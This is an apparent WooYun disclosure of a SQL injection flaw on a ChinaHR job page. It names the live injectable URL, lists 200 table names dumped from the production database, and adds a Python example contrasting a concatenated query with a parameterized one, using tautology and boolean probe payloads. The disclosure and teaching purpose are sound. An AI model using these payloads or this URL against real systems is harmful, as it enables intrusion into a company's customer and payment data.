
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-059402

Title: ChinaHR (中华英才网) SQL injection vulnerability

Vendor: 中华英才网 (ChinaHR)

Author: luwikes

Submitted: 2014-05-04 23:37

Fix deadline: 2014-06-18 23:38

Disclosed: 2014-06-18 23:38

Type: SQL injection

Severity: Medium

Self-assessed Rank: 1

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-05-04: Vendor being contacted and waiting for the vendor to claim the report; details not disclosed publicly
2014-06-18: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Pretty trivial.

Detailed description:

URL: http://pages.chinahr.com/2012/bj/spacechina_0327/jobs.asp?chiMemID=200504010002350134&strMemID=200504010002350005

[Screenshot: current.png]

[Screenshot: dbs.png]

Proof of vulnerability:

[Screenshot: countForCompany.png]


Database: bo
[200 tables]
+--------------------------------------------+
| dbo.Branch |
| dbo.Branch_bak20130518 |
| dbo.Branch_bak20130724 |
| dbo.CanceledCompanies |
| dbo.CanceledCompanyTransit |
| dbo.CheckDmData |
| dbo.ComanySync |
| dbo.Company |
| dbo.CompanyIDMapping |
| dbo.CompanyResourceTransit |
| dbo.CompanyResources |
| dbo.CompanyResourcesApplyLog |
| dbo.CompanyResourcesNameSearch |
| dbo.CompanyXMLFile |
| dbo.CompanyXMLFile_20130822 |
| dbo.ConfirmationForm |
| dbo.ConfirmationFormApprovalInfo |
| dbo.ConfirmationFormAttachment |
| dbo.ConfirmationFormInvoice |
| dbo.ConfirmationFormInvoiceModifyLog |
| dbo.ContractLastTime |
| dbo.CoreSiteDictInfo |
| dbo.CoreSiteJobCategories |
| dbo.CustomerContact |
| dbo.CustomerContactLog |
| dbo.CustomerContactModifyLog |
| dbo.CustomerCreditDegree |
| dbo.CustomerFraudStatus |
| dbo.CustomerIndustries |
| dbo.CustomerIndustries20131119 |
| dbo.CustomerIndustriesTransit |
| dbo.CustomerInfo |
| dbo.CustomerLocalInfo |
| dbo.CustomerLocalInfoTransit |
| dbo.CustomerNameSearch |
| dbo.CustomerQualification |
| dbo.CustomerSalesRelationApplication |
| dbo.CustomerSalesRelationMapping |
| dbo.CustomerSalesRelationMappingLog |
| dbo.CustomerUser |
| dbo.Customers |
| dbo.CustomersBORelation |
| dbo.DBTaskSyncInfo |
| dbo.DMEmailOpenLog |
| dbo.DMErrorEmailList |
| dbo.DMProject |
| dbo.DMQueryUsers |
| dbo.DMTargetUser |
| dbo.DMTargetUserQuery |
| dbo.DMTemplate |
| dbo.DMTemplate_20130301 |
| dbo.DMTemplate_20130523 |
| dbo.Dept |
| dbo.Dept20140124zhangfan |
| dbo.DeptAllSubInfo |
| dbo.DictInfo |
| dbo.DictMapping |
| dbo.EcomLookupChannelEcomProductTypes |
| dbo.EcomLookupEcomProductTypes |
| dbo.EcomLookupOrdersFraudStatuses |
| dbo.EcomLookupProductAttributeTypes |
| dbo.EcomProductAttributeChannelDefaults |
| dbo.EcomProductAttributes |
| dbo.EcomProductDefinitions |
| dbo.EcomProductModifyLog |
| dbo.EcomProductTerms |
| dbo.EcomProductTypeProductAttributes |
| dbo.EcomProductTypeTerm |
| dbo.EcomProducts |
| dbo.EcommContact |
| dbo.EcommContactType |
| dbo.EcommHeaderAttribute |
| dbo.EcommLineAttribute |
| dbo.EcommLineBill |
| dbo.EcommLineBillAttribute |
| dbo.EcommLineBillOpLog |
| dbo.EcommOrderFraudStatus |
| dbo.EcommOrderHeader |
| dbo.EcommOrderLineItem |
| dbo.EcommOrderPromotion |
| dbo.EcommOrderState |
| dbo.EcommOrderStateLog |
| dbo.EcommPaymentInfo |
| dbo.EcommPaymentProcessorType |
| dbo.EcommPaymentType |
| dbo.EcommProfileContact |
| dbo.GoesLocationMapping |
| dbo.ImportantTask |
| dbo.ImportantTaskHistory |
| dbo.InternsZoneCity |
| dbo.InternsZoneCompany |
| dbo.JobCategories |
| dbo.JobCategoriesAndOccupations |
| dbo.JobInfo |
| dbo.JobOCC |
| dbo.KOTSLog |
| dbo.KOTSProductsMapping |
| dbo.Location |
| dbo.LocationJob |
| dbo.LocationMJ |
| dbo.LookupCities |
| dbo.LookupCountries |
| dbo.LookupDetailedCompanySizes |
| dbo.LookupJobCategories |
| dbo.LookupJobTypes |
| dbo.LookupKarmaCompanySizes |
| dbo.LookupMonsterIndustries |
| dbo.LookupStates |
| dbo.LookupYearsExperience |
| dbo.LostAdminStaff |
| dbo.LostCustomer |
| dbo.LostCustomerContact |
| dbo.LostOldStaff |
| dbo.LostPublicArea |
| dbo.LostQualification |
| dbo.LostRelationship |
| dbo.LostTransferApply |
| dbo.MJIndustries |
| dbo.MSpeer_conflictdetectionconfigrequest |
| dbo.MSpeer_conflictdetectionconfigresponse |
| dbo.MSpeer_lsns |
| dbo.MSpeer_originatorid_history |
| dbo.MSpeer_request |
| dbo.MSpeer_response |
| dbo.MSpeer_topologyrequest |
| dbo.MSpeer_topologyresponse |
| dbo.MSpub_identity_range |
| dbo.MailSendLog |
| dbo.MonsterFieldsOfStudy |
| dbo.MonsterIndustry |
| dbo.OpLog |
| dbo.OrderAuditSataus |
| dbo.OrderHeaderInfo |
| dbo.PositionsPosition |
| dbo.PositionsXml |
| dbo.PublicArea |
| dbo.RegionInfo |
| dbo.ReportDownloadLog |
| dbo.RightControllerAction |
| dbo.RightPoint |
| dbo.Role |
| dbo.RoleRight |
| dbo.SMTPServer |
| dbo.SOSCustomerInfo |
| dbo.SStatCompanys |
| dbo.SStatDictInfo |
| dbo.SStatDictMapping |
| dbo.SStatDictMapping_bak |
| dbo.SStatJobs |
| dbo.SStatReports |
| dbo.Salary |
| dbo.SalesReportApply |
| dbo.SalesReportJobs |
| dbo.SerialCodeGenRecord |
| dbo.ShareCode |
| dbo.SpiderReportViewLog |
| dbo.TT |
| dbo.TaskEntry |
| dbo.TaskEntryHistory |
| dbo.TaskMemIDForOrderState |
| dbo.TaskOrderExpiryOrderID |
| dbo.TimeTrackerInfo |
| dbo.UserAndPublicAreaLeader |
| dbo.UserInfo |
| dbo.UserInfo_20121110 |
| dbo.UserLeader |
| dbo.UserLeaderTransit |
| dbo.UserPublicArea |
| dbo.UserRightDept |
| dbo.UserRole |
| dbo.companyidmapping201305201039 |
| dbo.contract |
| dbo.contract_application |
| dbo.csv_data |
| dbo.hxy |
| dbo.job_categories |
| dbo.job_info |
| dbo.job_occ |
| dbo.mem_Industries |
| dbo.mem_docinfo |
| dbo.mem_itemconfig |
| dbo.mem_reginfo |
| dbo.messages |
| dbo.monstercompany |
| dbo.org_info |
| dbo.sysarticlecolumns |
| dbo.sysarticles |
| dbo.sysarticleupdates |
| dbo.sysdiagrams |
| dbo.sysextendedarticlesview |
| dbo.syspublications |
| dbo.sysreplservers |
| dbo.sysschemaarticles |
| dbo.syssubscriptions |
| dbo.systranschemas |
| dbo.tbHost |
| dbo.tempProjectJobContent |
| dbo.temp_mapping |
| dbo.test |
| dbo.user_info |
+--------------------------------------------+
There are a few more injection points nearby, fairly distinctive ones.
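The report gives only the injectable URL and sqlmap's table listing; it does not show the code behind jobs.asp, nor say which of the two query-string parameters was injected. What follows is an added example, not code from the report or from ChinaHR, that shows the bug class and the fix side by side in Python, with SQLite standing in for the SQL Server backend (the dbo.* and MSpeer_* tables above identify it as SQL Server). It assumes chiMemID is looked up by splicing the value into the SQL text, as a classic ASP page typically does; the Company table, its rows and the function names are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the job-listing backend. SQLite is
# used only so the example runs offline; the real target is SQL Server.
_MEMBERS = [
    ("200504010002350134", "Space China"),
    ("200504010002350005", "Other Company A"),
    ("200504010002350999", "Other Company B"),
]


def _connect():
    """In-memory database with a constructed Company table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Company (chiMemID TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO Company VALUES (?, ?)", _MEMBERS)
    return conn


def jobs_vulnerable(chi_mem_id):
    """The injectable pattern: the query-string value becomes part of the SQL
    text, the way a classic ASP page builds
    "... WHERE chiMemID='" & Request("chiMemID") & "'".  A single quote in
    the value closes the literal and the rest is executed as SQL."""
    conn = _connect()
    sql = "SELECT name FROM Company WHERE chiMemID = '" + chi_mem_id + "'"
    return [row[0] for row in conn.execute(sql)]


def jobs_parameterized(chi_mem_id):
    """Hardened form: the value is bound as a parameter and can only ever be
    compared as data, whatever characters it contains."""
    conn = _connect()
    sql = "SELECT name FROM Company WHERE chiMemID = ?"
    return [row[0] for row in conn.execute(sql, (chi_mem_id,))]


def boolean_probe(lookup, chi_mem_id):
    """Boolean-based check of the kind sqlmap starts with: append a true and a
    false condition to the same valid ID.  An injectable endpoint answers the
    two differently; a parameterized one treats both as literal IDs, matches
    nothing either way, and therefore looks identical.  Returns True when the
    endpoint behaves as injectable."""
    true_case = lookup(chi_mem_id + "' AND '1'='1")
    false_case = lookup(chi_mem_id + "' AND '1'='2")
    return true_case != false_case


def demo():
    """Tautology payload against both versions, plus the boolean probe."""
    payload = "x' OR '1'='1"
    return {
        "vulnerable_rows": jobs_vulnerable(payload),       # every company
        "parameterized_rows": jobs_parameterized(payload),  # nothing
        "vulnerable_injectable": boolean_probe(jobs_vulnerable, "200504010002350134"),
        "parameterized_injectable": boolean_probe(jobs_parameterized, "200504010002350134"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The probe is the same true/false pair a tester sends by hand before reaching for sqlmap; the fix is the bound parameter, which on the real stack means ADODB.Command parameters or a stored procedure call instead of string concatenation in the ASP page.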

Fix recommendation:

~

Copyright notice: when reproducing, credit the source: luwikes@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused